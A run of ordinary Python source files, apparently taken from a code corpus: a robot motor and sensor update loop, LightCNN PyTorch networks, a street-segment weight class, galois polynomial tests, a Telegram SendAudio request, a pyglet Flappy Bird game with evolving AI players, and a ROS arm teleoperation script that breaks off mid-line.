self.tiltAngle = max( self.MIN_ANGLE, min( tiltAngle, self.MAX_ANGLE ) )\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def _loadPiSensorModule( self ):\n \n if self.robotConfig.piSensorModuleName != \"\":\n \n # Try to import the new sensor module\n newSensorModule = None\n try:\n \n newSensorModule = __import__( self.robotConfig.piSensorModuleName, fromlist=[''] )\n \n except Exception as e:\n logging.error( \"Caught exception when trying to import Pi sensor module\" )\n logging.error( str( e ) )\n \n if newSensorModule != None:\n \n # We have a new sensor module. Shutdown any existing sensor reader\n if self.piSensorReader != None:\n self.piSensorReader.shutdown()\n self.piSensorReader = None\n \n # Remove reference to existing sensor module\n self.piSensorModule = None\n self.piSensorModuleName = \"\"\n \n # Try to create the new Pi sensor reader\n newSensorReader = None\n \n try:\n \n newSensorReader = newSensorModule.PiSensorReader()\n \n except Exception as e:\n logging.error( \"Caught exception when trying to create Pi sensor reader\" )\n logging.error( str( e ) )\n \n if newSensorReader != None:\n self.piSensorModule = newSensorModule\n self.piSensorModuleName = self.robotConfig.piSensorModuleName\n self.piSensorReader = newSensorReader\n \n #-----------------------------------------------------------------------------------------------\n def update( self ):\n \n if not self.miniDriver.isConnected():\n return\n \n curTime = time.time()\n timeDiff = min( curTime - self.lastUpdateTime, self.MAX_UPDATE_TIME_DIFF )\n \n # Turn off the motors if we haven't received a motion command for a while\n if curTime - self.lastMotionCommandTime > self.MOTION_COMMAND_TIMEOUT:\n\n self.leftMotorSpeed = 0.0\n self.rightMotorSpeed = 0.0\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n # Update the pan and tilt angles\n self.panAngle += self.panSpeed*timeDiff\n self.tiltAngle += self.tiltSpeed*timeDiff\n \n self.panAngle = max( self.MIN_ANGLE, min( self.panAngle, self.MAX_ANGLE ) )\n self.tiltAngle = max( self.MIN_ANGLE, min( self.tiltAngle, self.MAX_ANGLE ) )\n \n # Update the mini driver\n self.miniDriver.setOutputs(\n self.leftMotorSpeed, self.rightMotorSpeed, self.panAngle, self.tiltAngle )\n self.miniDriver.update()\n \n # Send servo settings if needed\n if curTime - self.lastServoSettingsSendTime >= self.TIME_BETWEEN_SERVO_SETTING_UPDATES:\n \n self.miniDriver.setPanServoLimits( \n self.robotConfig.panPulseWidthMin, \n self.robotConfig.panPulseWidthMax )\n self.miniDriver.setTiltServoLimits( \n self.robotConfig.tiltPulseWidthMin, \n self.robotConfig.tiltPulseWidthMax )\n \n self.lastServoSettingsSendTime = curTime\n \n # Send sensor configuration if needed\n if curTime - self.lastSensorConfigurationSendTime >= self.TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES:\n \n self.miniDriver.setSensorConfiguration( self.robotConfig.miniDriverSensorConfiguration )\n \n self.lastSensorConfigurationSendTime = curTime\n \n # Change the Pi sensor module if needed\n if self.robotConfig.piSensorModuleName != self.piSensorModuleName:\n self._loadPiSensorModule()\n \n # Read from any sensors attached to the Pi\n if self.piSensorReader != None:\n \n self.piSensorDict = {}\n try:\n self.piSensorDict = self.piSensorReader.readSensors()\n except Exception as e:\n logging.error( \"Caught exception when trying to read from Pi sensor reader\" )\n logging.error( str( e ) )\n \n self.lastUpdateTime = curTime"} {"ext": "py", "sha": "1a306736302e368bcf1a6fff563146cd6babb1ea", "content": "import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass mfm(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):\r\n super(mfm, self).__init__()\r\n self.out_channels = out_channels\r\n if type == 1:\r\n self.filter = nn.Conv2d(in_channels, 2*out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\r\n else:\r\n self.filter = nn.Linear(in_channels, 2*out_channels)\r\n\r\n def forward(self, x):\r\n x = self.filter(x)\r\n out = torch.split(x, self.out_channels, 1)\r\n return torch.max(out[0], out[1])\r\n\r\nclass group(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\r\n super(group, self).__init__()\r\n self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)\r\n self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)\r\n\r\n def forward(self, x):\r\n x = self.conv_a(x)\r\n x = self.conv(x)\r\n return x\r\n\r\nclass resblock(nn.Module):\r\n def __init__(self, in_channels, out_channels):\r\n super(resblock, self).__init__()\r\n self.conv1 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)\r\n self.conv2 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)\r\n\r\n def forward(self, x):\r\n res = x\r\n out = self.conv1(x)\r\n out = self.conv2(out)\r\n out = out + res\r\n return out\r\n\r\nclass network_9layers(nn.Module):\r\n def __init__(self, num_classes=79077):\r\n super(network_9layers, self).__init__()\r\n self.features = nn.Sequential(\r\n mfm(1, 48, 5, 1, 2), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(48, 96, 3, 1, 1), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n group(96, 192, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(192, 128, 3, 1, 1),\r\n group(128, 128, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n )\r\n self.fc1 = mfm(8*8*128, 256, type=0)\r\n self.fc2 = nn.Linear(256, num_classes)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n x = F.dropout(x, training=self.training)\r\n out = self.fc2(x)\r\n return out, x\r\n\r\nclass network_29layers(nn.Module):\r\n def __init__(self, block, layers, num_classes=79077):\r\n super(network_29layers, self).__init__()\r\n self.conv1 = mfm(1, 48, 5, 1, 2)\r\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 128, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 128, 128)\r\n self.group4 = group(128, 128, 3, 1, 1)\r\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.fc = mfm(8*8*128, 256, type=0)\r\n self.fc2 = nn.Linear(256, num_classes)\r\n \r\n\r\n def _make_layer(self, block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.pool1(x)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = self.pool2(x)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = self.pool3(x)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = self.pool4(x)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n fc = F.dropout(fc, training=self.training)\r\n out = self.fc2(fc)\r\n return out, fc\r\n\r\n\r\nclass network_29layers_v2(nn.Module):\r\n def __init__(self, block, layers, num_classes=79077):\r\n super(network_29layers_v2, self).__init__()\r\n self.conv1 = mfm(1, 48, 5, 1, 2)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 128, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 128, 128)\r\n self.group4 = group(128, 128, 3, 1, 1)\r\n self.fc = nn.Linear(8*8*128, 256)\r\n self.fc2 = nn.Linear(256, num_classes[0], bias=False)\r\n \r\n def _make_layer(self, block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n \r\n output = list()\r\n for name, fun in self.fc_dict.iteritems():\r\n out = fun(x)\r\n output.append(out)\r\n\r\n return output, fc\r\n\r\nclass network_9layers_templet(nn.Module):\r\n def __init__(self, in_channel):\r\n super(network_9layers_templet, self).__init__()\r\n self.features = nn.Sequential(\r\n mfm(in_channel, 48, 5, 1, 2), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(48, 96, 3, 1, 1), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n group(96, 192, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(192, 128, 3, 1, 1),\r\n group(128, 128, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n )\r\n self.fc1 = mfm(8*8*128, 256, type=0)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n out = F.dropout(x, training=self.training)\r\n return out\r\n\r\nclass network_29layers_v2_templet(nn.Module):\r\n def __init__(self, in_channel, block, layers):\r\n super(network_29layers_v2_templet, self).__init__()\r\n self.conv1 = mfm(in_channel, 48, 5, 1, 2)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 256, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 256, 256)\r\n self.group4 = group(256, 128, 3, 1, 1)\r\n self.block5 = self._make_layer(block, layers[4], 128, 128)\r\n self.group5 = group(128, 64, 3, 1, 1)\r\n self.block6 = self._make_layer(block, layers[5], 64, 64)\r\n self.group6 = group(64, 64, 3, 1, 1)\r\n\r\n self.fc = nn.Linear(8*8*64, 256)\r\n \r\n def _make_layer(self, block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n '''\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n '''\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block5(x)\r\n x = self.group5(x)\r\n x = self.block6(x)\r\n x = self.group6(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n return x\r\n\r\n\r\ndef LightCNN_9Layers(**kwargs):\r\n model = network_9layers(**kwargs)\r\n return model\r\n\r\ndef LightCNN_29Layers(**kwargs):\r\n model = network_29layers(resblock, [1, 2, 3, 4], **kwargs)\r\n return model\r\n\r\ndef LightCNN_29Layers_v2(**kwargs):\r\n model = network_29layers_v2(resblock, [1, 2, 3, 4], **kwargs)\r\n return model\r\n\r\ndef LightCNN_9Layers_templet(in_channel, pretrained=False):\r\n model = network_9layers_templet(in_channel)\r\n return model\r\n\r\ndef LightCNN_29Layers_v2_templet(in_channel, pretrained=False):\r\n model = network_29layers_v2_templet(in_channel, resblock, [1,2,3,4,5,6])\r\n return model\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model = LightCNN_29Layers_v2_templet(3)\r\n print(model)"} {"ext": "py", "sha": "1a306781b92398cd07a55977d0c140895c09d105", "content": "\"\"\"\n``street.py``\n=============\n\nMódulo para o peso de um trecho de rua\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom protocols import Weightable\n\nfrom random import choice\nfrom functools import total_ordering\nfrom typing import Optional, List, Any, Dict\n\n\n#: Incluir velocidade máxima entre as possibilidades\n#: de velocidade assumida naquele trecho de rua\nINCLUDE_MAX_SPEED = False\n\n\n@total_ordering\nclass Street(Weightable):\n \"\"\"\n Classe de peso (:class:`Weightable`) do trecho da rua\n\n Assim que a propriedade :attr:`~street.Street.speed` é\n lida pela primeira vez, ela assume um valor que é mantido\n com ela durante a vida do objeto.\n\n No entanto, quuando essa instância é copiada com :func:`copy.deepcopy`,\n essa propriedade é desconfigurada e ela pode assumir um novo\n valor.\n\n :param distance: distância do trecho\n :param max_speed: velocidade máxima do trecho\n \"\"\"\n\n def __init__(self, distance: float, max_speed: float):\n self._distance = distance\n self._max_speed = max_speed\n self._latest_speeds: List[float] = []\n self._speed: Optional[float] = None\n\n def register_speeds(self, *speeds: float) -> None:\n \"\"\"Registra as velocidades atuais no trecho\"\"\"\n self._latest_speeds += list(speeds)\n\n @property\n def speed(self) -> float:\n \"\"\"Velocidade assumida no trecho\"\"\"\n if self._speed is None:\n if INCLUDE_MAX_SPEED:\n self._speed = choice(self._latest_speeds + [self._max_speed])\n elif self._latest_speeds:\n self._speed = choice(self._latest_speeds)\n else:\n self._speed = self._max_speed\n\n return self._speed\n\n @property\n def distance(self) -> float:\n \"\"\"distância do trecho\"\"\"\n return self._distance\n\n @property\n def time(self) -> float:\n \"\"\"tempo no trecho, com a velocidade assumida\n\n Usado para a comparação entre trechos\n \"\"\"\n if self.speed:\n return self.distance / self.speed\n else:\n return float('inf')\n\n def is_inf(self) -> bool:\n \"\"\"Se a velocidade assumida representa um tempo infinito\"\"\"\n return not self.speed\n\n def __eq__(self, other: Any) -> bool:\n return isinstance(other, Street) and self.time == other.time\n\n def __lt__(self, other: Any) -> bool:\n return isinstance(other, Street) and self.time < other.time\n\n def __add__(self, other: Street) -> Street:\n \"\"\"A soma dos trechos equivale a soma dos tempos\"\"\"\n d1, d2 = self.distance, other.distance\n s1, s2 = self.speed, other.speed\n\n distance = d1 + d2\n if not s1 or not s2:\n speed = 0.0\n else:\n speed = (distance * s1 * s2) / (d1 * s2 + d2 * s1)\n return Street(distance, speed)\n\n def __repr__(self) -> str:\n return repr(self.time)\n\n def __deepcopy__(self, memo: Dict[int, Any]) -> Street:\n \"\"\"Cópia especial que não mantém a velocidade assumida\"\"\"\n new = Street(self.distance, self._max_speed)\n new.register_speeds(*self._latest_speeds)\n\n memo[id(self)] = new\n return new\n"} {"ext": "py", "sha": "1a3067addfccb44f5e88596ca682d20c01dcaa28", "content": "\"\"\"\nA pytest module to test Galois field polynomial alternate constructors.\n\"\"\"\nimport numpy as np\nimport pytest\n\nimport galois\n\n\nFIELDS = [\n galois.GF2, # GF(2)\n galois.GF(31), # GF(p) with np.int dtypes\n galois.GF(36893488147419103183), # GF(p) with object dtype\n galois.GF(2**8), # GF(2^m) with np.int dtypes\n galois.GF(2**100), # GF(2^m) with object dtype\n galois.GF(7**3), # GF(p^m) with np.int dtypes\n galois.GF(109987**4), # GF(p^m) with object dtypes\n]\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_zero(field):\n p = galois.Poly.Zero(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 0\n assert np.array_equal(p.nonzero_degrees, [])\n assert np.array_equal(p.nonzero_coeffs, [])\n assert np.array_equal(p.degrees, [0])\n assert np.array_equal(p.coeffs, [0])\n assert p.integer == 0\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_one(field):\n p = galois.Poly.One(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 0\n assert np.array_equal(p.nonzero_degrees, [0])\n assert np.array_equal(p.nonzero_coeffs, [1])\n assert np.array_equal(p.degrees, [0])\n assert np.array_equal(p.coeffs, [1])\n assert p.integer == 1\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_identity(field):\n p = galois.Poly.Identity(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 1\n assert np.array_equal(p.nonzero_degrees, [1])\n assert np.array_equal(p.nonzero_coeffs, [1])\n assert np.array_equal(p.degrees, [1,0])\n assert np.array_equal(p.coeffs, [1,0])\n assert p.integer == field.order\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_random(field):\n p = galois.Poly.Random(2, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 2\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_integer(field):\n integer = field.order + 1 # Corresponds to p(x) = x + 1\n p = galois.Poly.Integer(integer, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 1\n assert np.array_equal(p.nonzero_degrees, [1,0])\n assert np.array_equal(p.nonzero_coeffs, [1,1])\n assert np.array_equal(p.degrees, [1,0])\n assert np.array_equal(p.coeffs, [1,1])\n assert p.integer == integer\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_degrees(field):\n # Corresponds to p(x) = x^2 + 1\n degrees = [2,0]\n coeffs = [1,1]\n p = galois.Poly.Degrees(degrees, coeffs, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 2\n assert np.array_equal(p.nonzero_degrees, [2,0])\n assert np.array_equal(p.nonzero_coeffs, [1,1])\n assert np.array_equal(p.degrees, [2,1,0])\n assert np.array_equal(p.coeffs, [1,0,1])\n assert p.integer == field.order**2 + 1\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_roots(field):\n a, b = field.Random(), field.Random()\n roots = [a, b] # p(x) = (x - a)*(x - b)\n degree = 2\n degrees = [2, 1, 0]\n coeffs = [1, -a + -b, (-a)*(-b)]\n nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]\n nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]\n integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])\n\n p = galois.Poly.Roots(roots, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == degree\n assert np.array_equal(p.nonzero_degrees, nonzero_degrees)\n assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)\n assert np.array_equal(p.degrees, degrees)\n assert np.array_equal(p.coeffs, coeffs)\n assert p.integer == integer\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_roots_with_multiplicity(field):\n a = field.Random()\n roots = [a] # p(x) = (x - a)*(x - a)\n multiplicities = [2]\n degree = 2\n degrees = [2, 1, 0]\n coeffs = [1, -a + -a, (-a)*(-a)]\n nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]\n nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]\n integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])\n\n p = galois.Poly.Roots(roots, multiplicities=multiplicities, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == degree\n assert np.array_equal(p.nonzero_degrees, nonzero_degrees)\n assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)\n assert np.array_equal(p.degrees, degrees)\n assert np.array_equal(p.coeffs, coeffs)\n assert p.integer == integer\n"} {"ext": "py", "sha": "1a3067bc4e8a963488a35ed23b8bd57e5673563c", "content": "# Copyright (C) 2015-2022 by Vd.\n# This file is part of Rocketgram, the modern Telegram bot framework.\n# Rocketgram is released under the MIT License (see LICENSE).\n\n\nfrom dataclasses import dataclass\nfrom typing import Union, Optional, List\n\nfrom .input_file import InputFile\nfrom .message_entity import MessageEntity\nfrom .parse_mode_type import ParseModeType\nfrom .request import Request\nfrom .utils import ALL_KEYBOARDS, MessageResultMixin\n\n\n@dataclass(frozen=True)\nclass SendAudio(MessageResultMixin, Request):\n \"\"\"\\\n Represents SendAudio request object:\n https://core.telegram.org/bots/api#sendaudio\n \"\"\"\n\n chat_id: Union[int, str]\n audio: Union[InputFile, str]\n caption: Optional[str] = None\n parse_mode: Optional[ParseModeType] = None\n caption_entities: Optional[List[MessageEntity]] = None\n duration: Optional[int] = None\n performer: Optional[str] = None\n title: Optional[str] = None\n thumb: Optional[Union[InputFile, str]] = None\n disable_notification: Optional[bool] = None\n protect_content: Optional[bool] = None\n reply_to_message_id: Optional[int] = None\n allow_sending_without_reply: Optional[bool] = None\n reply_markup: Optional[ALL_KEYBOARDS] = None\n\n def files(self) -> List[InputFile]:\n out = list()\n if isinstance(self.audio, InputFile):\n out.append(self.audio)\n if isinstance(self.thumb, InputFile):\n out.append(self.thumb)\n return out\n"} {"ext": "py", "sha": "1a3068a3585c91ebdc0587aa47980a1f82baca30", "content": "import pyglet\nfrom pyglet.window import key\nfrom pyglet.window.key import MOD_SHIFT\nfrom CGP import Individual, create_pop, evolve\n\nfrom load import *\n\ngame_window = pyglet.window.Window(1600, 1000)\npyglet.resource.path = ['../assets']\npyglet.resource.reindex()\n\nmain_batch = pyglet.graphics.Batch()\npillar_batch = pyglet.graphics.Batch()\nai_batch = pyglet.graphics.Batch()\n\nlabel_score = labels(batch=main_batch)\nlabel_alive = labels(y=520, batch=main_batch)\nlabel_best = labels(y=540, batch=main_batch)\nlabel_generation = labels(y=560, batch=main_batch)\npillars = new_pillar(pillar_batch)\n\ncompletion = False\nscore = 0\nbest_score = 0 # FIXME\ntime_count = 0\nflag = 0\nalive = 0\ngeneration = 1\nai_num = \"\"\npop = None\n\nbirds_obj = []\nai_birds_obj = []\n\n\ndef create_ai_bird(pops):\n global alive, ai_num\n for ind in pops:\n ai_birds_obj.append(new_ai_birds(individual=ind, batch=ai_batch))\n alive += 1\n ai_num = str(alive)\n\n\ndef clear_game():\n global pillars, generation, score, time_count\n for obj in pillars:\n obj.delete()\n pillars.remove(obj)\n for obj in birds_obj:\n obj.delete()\n birds_obj.remove(obj)\n generation += 1\n score = 0\n time_count = 0\n pillars = new_pillar(pillar_batch)\n\n\ndef init():\n global birds_obj, score\n\n score = 0\n label_score.text = \"Score: \" + str(score)\n\n birds_obj.append(new_birds(main_batch))\n\n\ndef init_pop():\n global ai_birds_obj, alive, ai_num, pop\n pop = create_pop(10)\n create_ai_bird(pop)\n label_alive.text = \"Alive: \" + str(alive) + \"/\" + ai_num\n label_generation.text = \"Generation: \" + str(generation)\n label_best.text = \"Best score: \" + str(best_score)\n\n\n@game_window.event\ndef on_draw():\n global completion\n game_window.clear()\n main_batch.draw()\n pillar_batch.draw()\n ai_batch.draw()\n for b in birds_obj:\n game_window.push_handlers(b.get_key_handler())\n\n\n@game_window.event\ndef on_key_press(symbol, modifiers):\n # add a new player bird\n if modifiers & MOD_SHIFT:\n if symbol == key.N:\n birds_obj.extend([new_birds(main_batch)])\n\n # make it faster\n if modifiers & MOD_SHIFT:\n if symbol == key.EQUAL:\n print(\"speed up\")\n pyglet.clock.schedule_interval(update, 1 / 120.0)\n\n # make it stop\n if modifiers & MOD_SHIFT:\n if symbol == key.BACKSPACE:\n print(\"stop\")\n pyglet.clock.unschedule(update)\n\n\ndef update(dt):\n global completion, score, time_count, flag, alive, pop, best_score\n time_count += 1\n\n # update\n for b in birds_obj:\n b.update(dt)\n # check collide\n if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):\n b.dead = True\n for p in pillars:\n p.update(dt)\n for b in ai_birds_obj:\n if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):\n b.dead = True\n b.update(dt)\n # flap or not\n b.check_flap(pillars[0].x, pillars[0].y)\n\n # check pillars out of bounds\n if pillars[0].check_bounds():\n pillars[0].dead = True\n pillars[1].dead = True\n\n # remove dead objects\n for to_remove in [obj for obj in pillars if obj.dead]:\n to_remove.delete()\n pillars.remove(to_remove)\n for to_remove in [obj for obj in birds_obj if obj.dead]:\n to_remove.delete()\n birds_obj.remove(to_remove)\n for to_remove in [obj for obj in ai_birds_obj if obj.dead]:\n alive -= 1\n to_remove.delete()\n ai_birds_obj.remove(to_remove)\n\n # add new pillars and reset flag for score\n if time_count % 240 == 0:\n time_count = 0\n flag = 0\n add_pillars = new_pillar(pillar_batch)\n pillars.extend(add_pillars)\n\n# label\n # score\n if flag == 0 and (len(birds_obj) > 0 or len(ai_birds_obj) > 0) and pillars[0].check_score():\n # print(time_count)\n flag += 1\n score += 1\n label_score.text = \"Score: \" + str(int(score))\n # check alive AI\n label_alive.text = \"Alive: \" + str(alive) + \"/\" + ai_num\n # check best score\n if score > best_score:\n best_score = score\n label_best.text = \"Best score: \" + str(best_score)\n # check generation\n label_generation.text = \"Generation: \" + str(generation)\n\n # evolve AI\n if alive == 0:\n pop = evolve(pop, 0.03, 4, 6)\n clear_game()\n create_ai_bird(pop)\n\n\nif __name__ == '__main__':\n init()\n init_pop()\n # init_ai()\n\n pyglet.clock.schedule_interval(update, 1 / 120.0)\n\n pyglet.app.run()\n"} {"ext": "py", "sha": "1a306966b719ef85a751c4fa1585f2a559fe9a4c", "content": "r\"\"\"\nRemote (pmaf.remote)\n====================\n\nExploit remote databases\n------------------------\n\nClasses\n-------\n\n.. autosummary::\n :toctree: generated/\n\n Entrez\n\n\"\"\"\nfrom ._entrez import Entrez\n\n__all__ = ['Entrez']"} {"ext": "py", "sha": "1a306a2a2dcf52f5e93c5095b38aed6e762c91ea", "content": "import rospy\n\nfrom std_msgs.msg import Float64\n\nimport sys, select, termios, tty\n\nmsg = \"\"\"\nMove the Arm Links !!\n---------------------------\nRotating (i), Picking(l) and Jaw Arm(o):\n u i o\n j k l\n m , .\n\nspace key, k : force stop\nanything else : stop smoothly\nCTRL-C to quit\n\"\"\"\n\nmoveBindings = {\n 'i':(1,0),\n 'o':(1,-1),\n 'j':(0,1),\n 'l':(0,-1),\n 'u':(1,1),\n ',':(-1,0),\n '.':(-1,1),\n 'm':(-1,-1),\n }\n\nspeedBindings={\n 'q':(1.1,1.1),\n 'z':(.9,.9),\n 'w':(1.1,1),\n 'x':(.9,1),\n 'e':(1,1.1),\n 'c':(1,.9),\n }\n\ndef getKey():\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], 0.1)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\nspeed = 0.1\nturn = 0.8\n\ndef vels(speed,turn):\n return \"currently:\\tspeed %s\\tturn %s \" % (speed,turn)\n\nif __name__==\"__main__\":\n settings = termios.tcgetattr(sys.stdin)\n\n rospy.init_node('arm_teleop')\n\n pub_pick = rospy.Publisher('/robot_arm/picking_arm_controller/command', Float64, queue_size = 10) # Picking Arm controller\n pub_rotate = rospy.Publisher('/robot_arm/rotating_arm_controller/command', Float64, queue_size = 10) # Rotating Arm controller\n pub_jaw = rospy.Publisher('/robot_arm/jaw_arm_controller/command', Float64, queue_size = 10) # Jaw Arm controller\n\n x = 1\n th = 0\n status = 0\n count = 0\n acc = 0.1\n target_speed = 0\n target_turn = 0\n control_speed = 0\n control_turn = 0\n speed = 8\n try:\n print msg\n print vels(speed,turn)\n while(1):\n key = getKey()\n if key in moveBindings.keys():\n x = moveBindings[key][0]\n th = moveBindings[key][1]\n count = 0\n elif key in speedBindings.keys():\n speed = speed * speedBindings[key][0]\n turn = turn * speedBindings[key][1]\n count = 0\n\n print vels(speed,turn)\n if (status == 14):\n print msg\n status = (status + 1) % 15\n elif key == ' ' or key == 'k' :\n x = 0\n th = 0\n control_speed = 0\n control_turn = 0\n else:\n count = count + 1\n if count > 10:\n x = 0\n th = 0\n\t\t pass\n if (key == '\\x03'):\n break\n\n target_speed = speed * x\n target_turn = turn * th\n\n if target_speed > control_speed:\n control_speed = min( target_speed, control_speed + 0.02 )\n elif target_speed < control_speed:\n control_speed = max( 